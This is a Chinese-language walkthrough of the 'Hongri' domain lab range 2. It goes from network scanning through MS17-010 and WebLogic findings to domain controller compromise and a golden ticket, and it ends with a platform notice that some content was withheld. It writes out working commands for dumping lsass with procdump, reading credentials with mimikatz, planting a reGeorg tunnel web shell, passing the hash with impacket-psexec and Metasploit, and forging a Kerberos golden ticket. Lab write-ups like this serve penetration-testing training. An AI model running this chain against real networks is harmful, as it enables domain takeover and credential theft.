把自己的net网段改到192.168.111.0
红日的第二个靶场,默认密码是1qaz@WSX,web机器要先恢复到快照v1.3才能正常登录。
管理员运行C:\Oracle\Middleware\user_projects\domains\base_domain\startWebLogic.bat
启动web服务
最终目标是打下域控,实操一次黄金票据
主机发现
arp-scan 192.168.111.0/24
192.168.111.80 192.168.111.201
端口扫描
nmap -sV -A 192.168.111.80
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-10-20T09:57:12
|_Not valid after: 2049-10-20T09:57:12
|_ssl-date: 2021-12-16T07:35:45+00:00; +1s from scanner time.
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
| Product_Version: 6.1.7601
|_ System_Time: 2021-12-16T07:35:05+00:00
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Not valid before: 2021-12-15T07:12:46
|_Not valid after: 2022-06-16T07:12:46
|_ssl-date: 2021-12-16T07:35:45+00:00; +1s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h08m33s, deviation: 3h01m23s, median: 0s
| ms-sql-info:
| 192.168.111.80:1433:
| Version:
| name: Microsoft SQL Server 2008 R2 SP2
| number: 10.50.4000.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP2
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: WEB
| NetBIOS computer name: WEB\x00
| Domain name: de1ay.com
| Forest name: de1ay.com
| FQDN: WEB.de1ay.com
|_ System time: 2021-12-16T15:35:09+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-16T07:35:08
|_ start_date: 2019-10-08T03:17:01
还有域信息
继续扫描smb
nmap -p 139,445 --script=smb-vuln* -Pn 192.168.111.80
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
发现受到ms17-010影响,但是检查一下发现没有可用的管道,更换账号为guest也无,看样子似乎很难利用了
80端口是空白页,扫到一个asp_net目录,再往下扫无结果。
7001是weblogic的登录页,尝试默认账密失败
dirsearch -u http://192.168.111.80:7001/
发现受ms17-010影响
7001端口weblogic使用weblogicscan发现版本为10.3.6
存在两个反序列化:CVE-2019-2725,CVE-2019-2890
端口扫描
nmap -sv -A -Pn 192.168.111.201
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: DE1AY)
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: PC
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: PC.de1ay.com
| Product_Version: 6.1.7601
|_ System_Time: 2021-12-16T09:18:08+00:00
| ssl-cert: Subject: commonName=PC.de1ay.com
| Issuer: commonName=PC.de1ay.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-12-15T07:30:42
| Not valid after: 2022-06-16T07:30:42
| MD5: 8cca 80e5 dca8 5601 933f de66 9029 1dbf
|_SHA-1: b876 734e bf47 0147 1adf 63dc 6941 38de 2c98 1086
|_ssl-date: 2021-12-16T09:18:47+00:00; 0s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h35m59s, deviation: 3h34m38s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: PC
| NetBIOS computer name: PC\x00
| Domain name: de1ay.com
| Forest name: de1ay.com
| FQDN: PC.de1ay.com
|_ System time: 2021-12-16T17:18:10+08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-16T09:18:11
|_ start_date: 2021-12-16T07:30:38
nmap -p 139,445 --script=smb-vuln* -Pn 192.168.111.201
也受ms17-010影响
死马当活马医,先用msf打一下ms17010,不行再去看weblogic
em。。。。还就那个获取system权限
#去掉部分乱码
chcp 65001
#查看网段
ipconfig
#
#查看域内用户
net user /domain
#定位域控
net group "Domain Controllers" /domain
net time /domain
net time得到域控域名,ping一下得到IP:10.10.10.10
尝试上传mimikatz失败
tasklist发现zhudongfangyu,得有360.
那就上传procdump64.exe,把lsass导出来
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
本地mimikazt打开
.\mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
可以翻到我们已知的1qaz@WSX明文密码还要hash
使用neo-reGeorg搭建隧道
python3 neoreg.py generate -k wuerror
然后上传tunnel.aspx到c:\inetpub\wwwroot\目录,建立隧道
sudo python3 neoreg.py -k wuerror -u http://192.168.111.80/tunnel.aspx
切换到root,修改/etc/proxychains4.conf:proxy_dns要注释掉
代理地址改到127.0.0.1:1080
hash填入Administrator的lm hash和ntlm hash
proxychains impacket-psexec -hashes f67ce55ac831223dc187b8085fe1d9df:161cff084477fe596a5db81874498a24 Administrator@10.10.10.10 whoami
成功执行!system权限
把ip换成201的一样可以
msfconsole中
use exploit/windows/smb/psexec
set proxies socks5:127.0.0.1:1080
set payload windows/meterpreter/bind_tcp
set RHOSTS 10.10.10.10
set SMBPASS f67ce55ac831223dc187b8085fe1d9df:161cff084477fe596a5db81874498a24
set SMBUser Administrator
exploit
回头发现应该是存在非约束委派的,mimikatz导出tickets里存在域管administrator的tgt,所以也可以尝试pass the ticket攻击
继续如上述,导出lsass.dmp下载到本地。获取Krbtgt用户的hash
sekurlsa::minidump dc-lsass.dmp
sekurlsa::Krbtgt
选择aes128的hash(256的失败了)
域sid来自
sekurlsa::logonPasswords full
administrator sid去掉末尾
impacket-ticketer -domain de1ay.com -domain-sid S-1-5-21-2756371121-2868759905-3853650604 -nthash 5eb13d2a0e1f4980c3e3810d5da3da4f stack2
生成票据后
export KRB5CCNAME=/home/wuerror/Downloads/temp/golden-ticket/stack2.ccache
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。